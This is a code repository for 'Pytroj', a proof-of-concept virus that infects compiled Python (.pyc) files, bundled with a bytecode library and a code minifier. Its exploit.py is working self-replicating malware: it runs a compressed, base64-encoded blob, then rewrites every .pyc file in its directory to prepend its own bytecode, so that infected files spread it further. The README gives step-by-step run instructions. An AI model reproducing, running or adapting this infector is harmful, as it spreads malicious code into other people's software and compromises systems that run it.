├── b.py ├── c.py ├── filesize.py ├── LICENSE.md ├── README.md ├── exploit.py ├── minify.py └── byteplay.py /b.py: -------------------------------------------------------------------------------- 1 | print "Original" 2 | -------------------------------------------------------------------------------- /c.py: -------------------------------------------------------------------------------- 1 | print __file__ 2 | import inspect 3 | print inspect.getfile(inspect.currentframe()) 4 | 5 | -------------------------------------------------------------------------------- /filesize.py: -------------------------------------------------------------------------------- 1 | import marshal, byteplay 2 | 3 | f = open('exploit.pyc') 4 | f.read(8) 5 | data = byteplay.Code.from_code(marshal.loads(f.read())) 6 | count = 0 7 | for op, args in data.code: 8 | if op == byteplay.SetLineno: 9 | count = args 10 | 11 | print count, len(data.code) 12 | -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | #Pytroj 2 | ###PoC for trojan in python -- Copyright (C) 2011 3 | 4 | This library is free software; you can redistribute it and/or 5 | modify it under the terms of the GNU Lesser General Public 6 | License as published by the Free Software Foundation; either 7 | version 2.1 of the License, or (at your option) any later version. 8 | 9 | This library is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 12 | Lesser General Public License for more details. 
13 | 14 | You should have received a copy of the GNU Lesser General Public 15 | License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 16 | 17 | ###Authors 18 | Joey Geralnik 19 | 20 | Leon Fedotov 21 | 22 | Itzik Kotler 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Pytroj 2 | 3 | __Pytroj is a proof of concept attack against .pyc files.__ It searches for other .pyc files and injects itself into them. The injected code can be any python code (in this case it prints "You have been exploited"). 4 | 5 | This proof of concept only searches for .pyc files in its own directory. To use it: 6 | 7 | python -c 'import exploit, b, c' 8 | python exploit.pyc 9 | 10 | The files b.pyc and c.pyc will now be infected. If you create another .pyc file (for example, python -c 'import byteplay') and run either b.pyc or c.pyc, the new file will also get infected. 11 | 12 | Another way to run an infected file is to import it once the .pyc file exists: 13 | 14 | python -c 'import b' 15 | 16 | The infected files print out a list of files that they have newly infected, followed by the phrase "You have been exploited" 17 | 18 | After that, infected programs will continue to execute as normal. 19 | 20 | [Slides are here](http://www.slideshare.net/DRagonRage519/pytroj-11153381 "slideshare") 21 | 22 | 23 | ### On the web 24 | 25 | * [Symantec - python has venom.] 
(http://www.symantec.com/connect/blogs/python-has-venom) 26 | * [Hackernews] (http://news.ycombinator.com/item?id=3039439) 27 | * [Jacob's Tips for Virus Removal] (http://jacoblol75.blog.com/2011/10/09/simple-ways-to-get-rid-of-python-pytroj/) 28 | * [Packet strom] (http://packetstormsecurity.org/files/105385/Pytroj-Tool-Python-Injector.html) 29 | 30 | For help, questions, or comments, feel free to contact us: 31 | 32 | 33 | [Joey Geralnik](https://github.com/jgeralnik "jgeralnik"), 34 | [Leon Fedotov](https://twitter.com/#!/LeonFedotov "Leon Fedotov"), 35 | [Itzik Kotler](https://github.com/ikotler "itzikkotler") 36 | -------------------------------------------------------------------------------- /exploit.py: -------------------------------------------------------------------------------- 1 | signature = "DC9723" #signature is placed at beginning and end of file to identify infected code 2 | import glob, zlib, base64 3 | 4 | #File only works as a pyc 5 | if __file__.endswith('.pyc'): 6 | 7 | #The minified version of byteplay 8 | exec 
zlib.decompress(base64.b64decode('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')) 9 | 10 | #Load this file and identify the exploit part 11 | f = open(__file__, 'r') 12 | 13 | #First 8 bytes are magic number and timestamp 14 | head = f.read(8) 15 | 16 | data = Code.from_code(marshal.loads(f.read())) 17 | f.close() 18 | 19 | last_line = 1 20 | for i in xrange(2, len(data.code)): 21 | if data.code[i][0] == SetLineno: 22 | #Find last line of code to update the real code appropriately 23 | last_line = data.code[i][1] 24 | if type(data.code[i][1]) == type('') and data.code[i][1] == signature: 25 | #Found signature at end of exploit 26 | EXPLOIT_SIZE = i+1 27 | break 28 | 29 | exploit = data.code[:EXPLOIT_SIZE] 30 | 31 | def infect(f_to_infect): 32 | 33 | f = open(f_to_infect, 'r') 34 | 35 | #Magic number and timestamp 36 | head = f.read(8) 37 | 38 | data = Code.from_code(marshal.loads(f.read())) 39 | if data.code[1][1] == signature: 40 | #Code is already infected 41 | return 42 | 43 | print f_to_infect 44 | f.close() 45 | lines = [] 46 | for i, op in enumerate(data.code): 47 | if op[0] == SetLineno: 48 | #Update line numbers to match with new code 49 | data.code[i] = (SetLineno, op[1]+last_line) 50 | 51 | #Insert exploit 52 | data.code[:0] = exploit 53 | 54 | newfile = open(f_to_infect, 'w') 55 | newfile.write(head) 56 | marshal.dump(data.to_code(), newfile) 57 | newfile.close() 58 | for i in glob.glob("./*.pyc"): 59 | infect(i) 60 | 61 | print "You have been exploited" 62 | 63 | signature = "DC9723" 64 | -------------------------------------------------------------------------------- /minify.py: -------------------------------------------------------------------------------- 1 | ## {{{ http://code.activestate.com/recipes/576704/ (r16) 2 | #!/usr/bin/env python 3 | # -*- coding: utf-8 -*- 4 | 
# 5 | # pyminifier.py 6 | # 7 | # Copyright 2009 Dan McDougall 8 | # 9 | # This program is free software; you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation; Version 3 of the License 12 | # 13 | # This program is distributed in the hope that it will be useful, 14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | # GNU General Public License for more details. 17 | # 18 | # You should have received a copy of the GNU General Public License 19 | # along with this program; if not, the license can be downloaded here: 20 | # 21 | # http://www.gnu.org/licenses/gpl.html 22 | 23 | # Meta 24 | __version__ = '1.4.1' 25 | __license__ = "GNU General Public License (GPL) Version 3" 26 | __version_info__ = (1, 4, 1) 27 | __author__ = 'Dan McDougall ' 28 | 29 | """ 30 | **Python Minifier:** Reduces the size of (minifies) Python code for use on 31 | embedded platforms. 32 | 33 | Performs the following: 34 | - Removes docstrings. 35 | - Removes comments. 36 | - Minimizes code indentation. 37 | - Joins multiline pairs of parentheses, braces, and brackets (and removes extraneous whitespace within). 38 | - Preserves shebangs and encoding info (e.g. "# -- coding: utf-8 --"). 39 | 40 | Various examples and edge cases are sprinkled throughout the pyminifier code so 41 | that it can be tested by minifying itself. The way to test is thus: 42 | 43 | .. code-block:: bash 44 | 45 | $ python pyminifier.py pyminifier.py > minified_pyminifier.py 46 | $ python minified_pyminifier.py pyminifier.py > this_should_be_identical.py 47 | $ diff minified_pyminifier.py this_should_be_identical.py 48 | $ 49 | 50 | If you get an error executing minified_pyminifier.py or 51 | 'this_should_be_identical.py' isn't identical to minified_pyminifier.py then 52 | something is broken. 
53 | """ 54 | 55 | import sys, re, cStringIO, tokenize 56 | from optparse import OptionParser 57 | 58 | # Compile our regular expressions for speed 59 | multiline_quoted_string = re.compile(r'(\'\'\'|\"\"\")') 60 | not_quoted_string = re.compile(r'(\".*\'\'\'.*\"|\'.*\"\"\".*\')') 61 | trailing_newlines = re.compile(r'\n\n') 62 | shebang = re.compile('^#\!.*$') 63 | encoding = re.compile(".*coding[:=]\s*([-\w.]+)") 64 | multiline_indicator = re.compile('\\\\(\s*#.*)?\n') 65 | # The above also removes trailing comments: "test = 'blah \ # comment here" 66 | 67 | # These aren't used but they're a pretty good reference: 68 | double_quoted_string = re.compile(r'((? last_lineno: 112 | last_col = 0 113 | if start_col > last_col: 114 | out += (" " * (start_col - last_col)) 115 | # Remove comments: 116 | if token_type == tokenize.COMMENT: 117 | pass 118 | # This series of conditionals removes docstrings: 119 | elif token_type == tokenize.STRING: 120 | if prev_toktype != tokenize.INDENT: 121 | # This is likely a docstring; double-check we're not inside an operator: 122 | if prev_toktype != tokenize.NEWLINE: 123 | # Note regarding NEWLINE vs NL: The tokenize module 124 | # differentiates between newlines that start a new statement 125 | # and newlines inside of operators such as parens, brackes, 126 | # and curly braces. Newlines inside of operators are 127 | # NEWLINE and newlines that start new code are NL. 128 | # Catch whole-module docstrings: 129 | if start_col > 0: 130 | # Unlabelled indentation means we're inside an operator 131 | out += token_string 132 | # Note regarding the INDENT token: The tokenize module does 133 | # not label indentation inside of an operator (parens, 134 | # brackets, and curly braces) as actual indentation. 
def reduce_operators(source):
    """
    Remove the spaces around operators in 'source' and return the result.

    Example:

    .. code-block:: python

        def foo(foo, bar, blah):
            test = "This is a %s" % foo

    Will become:

    .. code-block:: python

        def foo(foo,bar,blah):
            test="This is a %s"%foo

    'source' is tokenized with the tokenize module; every physical line is
    rebuilt from its tokens and then has at most one space removed on each
    side of every operator.  An operator that is the first token of a
    statement (a decorator's '@', an opening paren, ...) is left alone so the
    line's indentation survives.
    """
    # A previous token of one of these types means the operator starts a line
    line_starters = (tokenize.NEWLINE, tokenize.DEDENT, tokenize.INDENT)
    io_obj = cStringIO.StringIO(source)
    finished_lines = []   # Completed lines; joined once at the end
    out_line = ""         # The line currently being rebuilt
    remove_columns = []   # Columns (in the untouched line) to try to delete
    prev_toktype = tokenize.INDENT
    last_lineno = -1
    last_col = 0
    for tok in tokenize.generate_tokens(io_obj.readline):
        token_type, token_string = tok[0], tok[1]
        start_line, start_col = tok[2]
        end_line, end_col = tok[3]
        if start_line > last_lineno:
            last_col = 0
        if start_col > last_col:
            # Re-create the whitespace the tokenizer skipped over
            out_line += " " * (start_col - last_col)
        if token_type == tokenize.OP and prev_toktype not in line_starters:
            # This is just a regular operator; remove spaces
            remove_columns.append(start_col)    # Before OP (after the shift)
            remove_columns.append(end_col + 1)  # After OP (after the shift)
        out_line += token_string
        if token_string.endswith('\n'):
            # End of a physical line: apply the pending removals.  'lshift'
            # starts at 1 so that 'start_col' addresses the character just
            # before the operator and 'end_col + 1' the one just after it; it
            # grows by one per deleted space to keep later columns aligned.
            lshift = 1
            for col in remove_columns:
                col = col - lshift
                try:
                    if out_line[col] == " ": # Only if it is a space
                        out_line = out_line[:col] + out_line[col+1:]
                        lshift += 1
                except IndexError: # Reached the end of the line, no biggie
                    pass
            finished_lines.append(out_line)
            remove_columns = []
            out_line = ""
        prev_toktype = token_type
        last_col = end_col
        last_lineno = end_line
    # This makes sure to capture the last line if it doesn't end in a newline:
    finished_lines.append(out_line)
    return "".join(finished_lines)
1 or len(line.split("'''")): 305 | # This is a single line that uses the triple quotes twice 306 | # Treat it as if it were just a regular line: 307 | output += line + '\n' 308 | quoted_string = False 309 | else: 310 | output += line + '\n' 311 | quoted_string = True 312 | elif quoted_string and multiline_quoted_string.search(line): 313 | output += line + '\n' 314 | quoted_string = False 315 | # Now let's focus on the lines containing our opener and/or closer: 316 | elif not quoted_string: 317 | if opener_regex.search(line) or closer_regex.search(line) or inside_pair: 318 | for character in line: 319 | if character == opener: 320 | if not escaped and not inside_quotes: 321 | openers += 1 322 | inside_pair = True 323 | output += character 324 | else: 325 | escaped = False 326 | output += character 327 | elif character == closer: 328 | if not escaped and not inside_quotes: 329 | if openers and openers == (closers + 1): 330 | closers = 0 331 | openers = 0 332 | inside_pair = False 333 | output += character 334 | else: 335 | closers += 1 336 | output += character 337 | else: 338 | escaped = False 339 | output += character 340 | elif character == '\\': 341 | if escaped: 342 | escaped = False 343 | output += character 344 | else: 345 | escaped = True 346 | output += character 347 | elif character == '"' and escaped: 348 | output += character 349 | escaped = False 350 | elif character == "'" and escaped: 351 | output += character 352 | escaped = False 353 | elif character == '"' and inside_quotes: 354 | if inside_single_quotes: 355 | output += character 356 | else: 357 | inside_quotes = False 358 | inside_double_quotes = False 359 | output += character 360 | elif character == "'" and inside_quotes: 361 | if inside_double_quotes: 362 | output += character 363 | else: 364 | inside_quotes = False 365 | inside_single_quotes = False 366 | output += character 367 | elif character == '"' and not inside_quotes: 368 | inside_quotes = True 369 | inside_double_quotes = True 370 | 
def fix_empty_methods(source):
    """
    Appends 'pass' to empty methods/functions (i.e. where there was nothing but
    a docstring before we removed it =).

    Example:

    .. code-block:: python

        # Note: This triple-single-quote inside a triple-double-quote is also a
        # pyminifier self-test
        def myfunc():
            '''This is just a placeholder function.'''

    Will become:

    .. code-block:: python

        def myfunc(): pass

    A 'def' line counts as empty when the next non-blank line is indented no
    deeper than the 'def' itself, or when no further non-blank line exists.
    One-line definitions such as ``def f(): return 1`` already have a body
    and are left untouched.  Blank lines are emitted as bare newlines and
    every other line is emitted followed by a newline.
    """
    # Only a bare signature - nothing but whitespace after the colon - can be
    # an empty method.
    method = re.compile(r'^\s*def\s+\w+\s*\(.*\)\s*:\s*$')
    output = []
    pending_def = None     # Signature line whose body we haven't seen yet
    pending_indent = 0     # Leading-whitespace width of that signature
    for line in source.split('\n'):
        if not line.strip(): # Don't look at blank lines
            output.append("\n")
            continue
        if pending_def is not None:
            this_indent = len(line) - len(line.lstrip())
            if this_indent <= pending_indent:
                # Nothing was indented under the def: it is empty
                output.append("%s pass\n" % pending_def)
            else:
                output.append("%s\n" % pending_def)
            pending_def = None
        # The current line is examined even when it follows a def, so that
        # consecutive empty methods are all fixed.
        if method.match(line):
            pending_def = line
            pending_indent = len(line) - len(line.lstrip())
        else:
            output.append("%s\n" % line)
    if pending_def is not None:
        # The source ended right after a signature; don't drop it
        output.append("%s pass\n" % pending_def)
    return "".join(output)
def _self_extracting_script(source, codec):
    """
    Return a two-line script that imports 'codec' (the bz2 or zlib module) and
    base64, then executes 'source' from a base64-encoded, compressed literal.
    """
    import base64
    try:
        compressed = codec.compress(source)
    except TypeError:
        # Python 3 only compresses bytes; text is encoded first
        compressed = codec.compress(source.encode('utf-8'))
    payload = base64.b64encode(compressed)
    if not isinstance(payload, str):
        # Python 3 returns bytes; the alphabet is pure ASCII
        payload = payload.decode('ascii')
    name = codec.__name__
    # exec(...) with parentheses is accepted by both the Python 2 statement
    # and the Python 3 function.
    return "import %s, base64\nexec(%s.decompress(base64.b64decode('%s')))\n" % (
        name, name, payload)

def bz2_pack(source):
    "Returns 'source' as a bzip2-compressed, self-extracting python script."
    import bz2
    return _self_extracting_script(source, bz2)

def gz_pack(source):
    "Returns 'source' as a gzip-compressed, self-extracting python script."
    import zlib
    return _self_extracting_script(source, zlib)
def main():
    """
    Command-line entry point.

    Parses the options, minifies the script named by the first positional
    argument, optionally wraps the result with bz2_pack() or gz_pack(), and
    writes it to --outfile (or to stdout when no output file is given).

    Exits with status 2, after printing the help text, when no input file is
    named or when it cannot be read.
    """
    usage = '%prog [options] ""'
    parser = OptionParser(usage=usage, version=__version__)
    parser.disable_interspersed_args()
    parser.add_option(
        "-o", "--outfile",
        dest="outfile",
        default=None,
        help="Save output to the given file.",
        metavar=""
    )
    parser.add_option(
        "--bzip2",
        action="store_true",
        dest="bzip2",
        default=False,
        help="bzip2-compress the result into a self-executing python script."
    )
    parser.add_option(
        "--gzip",
        action="store_true",
        dest="gzip",
        default=False,
        help="gzip-compress the result into a self-executing python script."
    )
    options, args = parser.parse_args()
    if not args:
        # No input file: show the usage instead of an IndexError message
        parser.print_help()
        sys.exit(2)
    try:
        infile = open(args[0])
        try:
            source = infile.read()
        finally:
            infile.close() # Don't leak the handle, even if read() fails
    except (IOError, OSError):
        # sys.exc_info() is used rather than binding the exception in the
        # except clause so this parses on old and new interpreters alike.
        sys.stdout.write("%s\n" % (sys.exc_info()[1],))
        parser.print_help()
        sys.exit(2)
    # Minify our input script
    result = minify(source)
    # Compress it if we were asked to do so
    if options.bzip2:
        result = bz2_pack(result)
    elif options.gzip:
        result = gz_pack(result)
    # Either save the result to the output file or print it to stdout
    if options.outfile:
        outfile = open(options.outfile, 'w')
        try:
            outfile.write(result)
        finally:
            outfile.close()
    else:
        sys.stdout.write(result + "\n")
class Opcode(int):
    """An int which represents an opcode - has a nicer repr.

    repr() and str() give the opcode's name as found in the module-level
    'opname' mapping.  Values that have no entry there (opname is built from
    opmap, which leaves out EXTENDED_ARG) fall back to the plain integer
    representation instead of raising KeyError.
    """
    def __repr__(self):
        try:
            return opname[self]
        except KeyError:
            # Not a named opcode; show the number rather than blow up
            return int.__repr__(self)
    __str__ = __repr__
haslocal = set(map(Opcode, opcode.haslocal))
hascompare = set(map(Opcode, opcode.hascompare))
hasfree = set(map(Opcode, opcode.hasfree))
# Opcodes whose preceding LOAD_CONST carries a code object.
hascode = set((MAKE_FUNCTION, MAKE_CLOSURE))


class _se:
    """Namespace listing the static stack effect of simple opcodes.

    Every attribute is named after an opcode and holds a (pop, push) tuple.
    The class is only a convenient way to write the table down; right after
    its definition the name _se is rebound to a dict keyed by Opcode.
    """
    # Taken from assembler.py by Phillip J. Eby

    # --- pop 0 ---
    NOP = PRINT_NEWLINE = DELETE_FAST = DELETE_GLOBAL = DELETE_NAME = (0, 0)

    LOAD_LOCALS = LOAD_CONST = LOAD_NAME = LOAD_GLOBAL = LOAD_FAST = \
        LOAD_CLOSURE = LOAD_DEREF = BUILD_MAP = (0, 1)

    # --- pop 1 ---
    POP_TOP = DELETE_SLICE_0 = DELETE_ATTR = STORE_DEREF = PRINT_EXPR = \
        PRINT_ITEM = PRINT_NEWLINE_TO = IMPORT_STAR = STORE_NAME = \
        STORE_GLOBAL = STORE_FAST = SET_ADD = (1, 0)

    UNARY_POSITIVE = UNARY_NEGATIVE = UNARY_NOT = UNARY_CONVERT = \
        UNARY_INVERT = GET_ITER = LOAD_ATTR = SLICE_0 = (1, 1)

    DUP_TOP = IMPORT_FROM = (1, 2)

    # --- pop 2 ---
    STORE_SLICE_0 = DELETE_SLICE_1 = DELETE_SLICE_2 = DELETE_SUBSCR = \
        STORE_ATTR = PRINT_ITEM_TO = STORE_MAP = MAP_ADD = (2, 0)

    BINARY_POWER = BINARY_MULTIPLY = BINARY_DIVIDE = BINARY_FLOOR_DIVIDE = \
        BINARY_TRUE_DIVIDE = BINARY_MODULO = BINARY_ADD = BINARY_SUBTRACT = \
        BINARY_SUBSCR = BINARY_LSHIFT = BINARY_RSHIFT = BINARY_AND = \
        BINARY_XOR = BINARY_OR = COMPARE_OP = \
